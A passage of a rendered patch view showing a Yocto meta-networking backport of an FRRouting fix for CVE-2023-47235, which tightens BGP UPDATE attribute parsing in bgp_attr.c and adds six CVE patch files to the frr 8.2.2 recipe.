67 | Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org> | ||
68 | |||
69 | CVE: CVE-2023-47235 | ||
70 | |||
71 | Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/6814f2e0138a6ea5e1f83bdd9085d9a77999900b] | ||
72 | |||
73 | Signed-off-by: Narpat Mali <narpat.mali@windriver.com> | ||
74 | --- | ||
75 | bgpd/bgp_attr.c | 15 ++++++++++++--- | ||
76 | 1 file changed, 12 insertions(+), 3 deletions(-) | ||
77 | |||
78 | diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c | ||
79 | index 13da27e99..1e08a218e 100644 | ||
80 | --- a/bgpd/bgp_attr.c | ||
81 | +++ b/bgpd/bgp_attr.c | ||
82 | @@ -3050,10 +3050,13 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr, | ||
83 | uint8_t type = 0; | ||
84 | |||
85 | /* BGP Graceful-Restart End-of-RIB for IPv4 unicast is signaled as an | ||
86 | - * empty UPDATE. */ | ||
87 | + * empty UPDATE. Treat-as-withdraw, otherwise if we just ignore it, | ||
88 | + * we will pass it to be processed as a normal UPDATE without mandatory | ||
89 | + * attributes, that could lead to harmful behavior. | ||
90 | + */ | ||
91 | if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag && | ||
92 | !length) | ||
93 | - return BGP_ATTR_PARSE_PROCEED; | ||
94 | + return BGP_ATTR_PARSE_WITHDRAW; | ||
95 | |||
96 | if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_ORIGIN))) | ||
97 | type = BGP_ATTR_ORIGIN; | ||
98 | @@ -3477,7 +3480,13 @@ done: | ||
99 | } | ||
100 | |||
101 | transit = bgp_attr_get_transit(attr); | ||
102 | - if (ret != BGP_ATTR_PARSE_ERROR) { | ||
103 | + /* If we received an UPDATE with mandatory attributes, then | ||
104 | + * the unrecognized transitive optional attribute of that | ||
105 | + * path MUST be passed. Otherwise, it's an error, and from | ||
106 | + * security perspective it might be very harmful if we continue | ||
107 | + * here with the unrecognized attributes. | ||
108 | + */ | ||
109 | + if (ret == BGP_ATTR_PARSE_PROCEED) { | ||
110 | /* Finally intern unknown attribute. */ | ||
111 | if (transit) | ||
112 | bgp_attr_set_transit(attr, transit_intern(transit)); | ||
113 | -- | ||
114 | 2.40.0 | ||
diff --git a/meta-networking/recipes-protocols/frr/frr_8.2.2.bb b/meta-networking/recipes-protocols/frr/frr_8.2.2.bb index 58754b825..03b106131 100644 --- a/meta-networking/recipes-protocols/frr/frr_8.2.2.bb +++ b/meta-networking/recipes-protocols/frr/frr_8.2.2.bb | |||
@@ -21,6 +21,12 @@ SRC_URI = "git://github.com/FRRouting/frr.git;protocol=https;branch=stable/8.2 \ | |||
21 | file://CVE-2023-38802.patch \ | 21 | file://CVE-2023-38802.patch \ |
22 | file://CVE-2023-41358.patch \ | 22 | file://CVE-2023-41358.patch \ |
23 | file://CVE-2023-41909.patch \ | 23 | file://CVE-2023-41909.patch \ |
24 | file://CVE-2023-38406.patch \ | ||
25 | file://CVE-2023-38407.patch \ | ||
26 | file://CVE-2023-46752.patch \ | ||
27 | file://CVE-2023-46753.patch \ | ||
28 | file://CVE-2023-47234.patch \ | ||
29 | file://CVE-2023-47235.patch \ | ||
24 | file://frr.pam \ | 30 | file://frr.pam \ |
25 | " | 31 | " |
26 | 32 | ||